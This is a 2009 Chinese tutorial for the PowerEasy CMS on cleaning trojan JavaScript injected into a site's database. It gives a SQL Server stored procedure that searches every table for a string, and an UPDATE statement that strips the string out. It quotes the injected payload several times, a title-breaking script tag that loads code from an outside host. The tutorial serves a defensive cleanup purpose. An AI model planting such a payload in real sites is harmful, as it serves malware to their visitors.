解析【木馬】手動刪除動易數據庫被注入JS代碼的方法_動易Cms教程
      
編輯Tag賺U幣
      


      教程Tag:暫無Tag,歡迎添加,賺取U幣!
      


      

      問題:動易數據庫連續幾天被注入JS代碼,那么可不可以直接從數據庫著手進行清除木馬代碼操作呢?
      

      數據庫被注入的代碼是:"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--
      

       
      

      解決:發現在PE_CLASS表中的tips、Meta_Keywords、Meta_Description、LinkUrl字段存在注入的JS,表太多,一個一個去查,是比較費時費力的,那么我們可以通過一個全庫搜索的方法,建立一個存儲過程
      

      

      create   proc   p_search   
        @str   Nvarchar(1000)   --要搜索的字符串   
        as   
        if   @str=''   return   
          
        declare   @s   Nvarchar(4000)   
        create   table   #t(表名   sysname,字段名   sysname)   
          
        declare   tb   cursor   local   for   
        select   s='if   exists(select   1   from   ['+replace(b.name,']',']]')+']   where   ['+a.name+']   like   N''%'+@str+'%'')   
        print   ''所在的表及字段:   ['+b.name+'].['+a.name+']'''   
        from   syscolumns   a   join   sysobjects   b   on   a.id=b.id   
        where   b.xtype='U'   and   a.status>=0   
        and   a.xtype   in(175,239,99,35,231,167)   
        open   tb   
        fetch   next   from   tb   into   @s   
        while   @@fetch_status=0   
        begin   
        exec(@s)   
        fetch   next   from   tb   into   @s   
        end   
        close   tb   
        deallocate   tb
      GO
      

      


      執行:p_search '"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--'
      

      找到被注入的表及字段,執行恢復操作,下面是一個例子
      

      UPDATE PE_Class SET Tips= Replace(Tips,'"></title><script src="http://www2.s800qn.cn/csrss/w.js"></script><!--','')
      

       
      

      注意:以上雖然能較方便的處理木馬代碼,但我們仍要對網站文件進行清查工作,不然網站是會反復中木馬的,特別是對于有生成靜態頁面的網站,我們要重新生成下網站頁面,以正常的生成頁面覆蓋現有木馬代碼的頁面
      

       
      


      查看更多 動易Cms教程  動易Cms模板
      

      


      來源:模板無憂//所屬分類:動易Cms教程/更新時間:2009-06-22


      


      



      


      



      相關動易Cms教程